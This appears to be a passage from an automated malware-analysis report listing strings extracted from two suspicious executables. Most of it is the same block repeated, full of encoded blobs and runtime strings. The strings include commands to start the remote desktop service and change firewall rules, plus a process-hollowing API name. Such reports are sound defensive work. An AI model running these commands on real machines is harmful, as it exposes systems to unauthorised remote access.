yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                        Source: tOuVwTJrau.exe, 00000000.00000000.1666310051.0000000000331000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: net start termservice
                        Source: tOuVwTJrau.exe, 00000000.00000000.1666310051.0000000000331000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                        Source: tOuVwTJrau.exe, 00000000.00000003.1671013715.0000000006E01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: net start termservice
                        Source: tOuVwTJrau.exe, 00000000.00000003.1671013715.0000000006E01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                        Source: Gxtuum.exeString found in binary or memory: net start termservice
                        Source: Gxtuum.exe, 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: net start termservice
                        Source: Gxtuum.exe, 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                        Source: Gxtuum.exe, 00000001.00000000.1673692294.0000000000131000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: net start termservice
                        Source: Gxtuum.exe, 00000001.00000000.1673692294.0000000000131000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                        Source: Gxtuum.exeString found in binary or memory: net start termservice
                        Source: Gxtuum.exe, 00000002.00000000.1676955540.0000000000131000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: net start termservice
                        Source: Gxtuum.exe, 00000002.00000000.1676955540.0000000000131000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                        Source: Gxtuum.exe, 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: net start termservice
                        Source: Gxtuum.exe, 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA 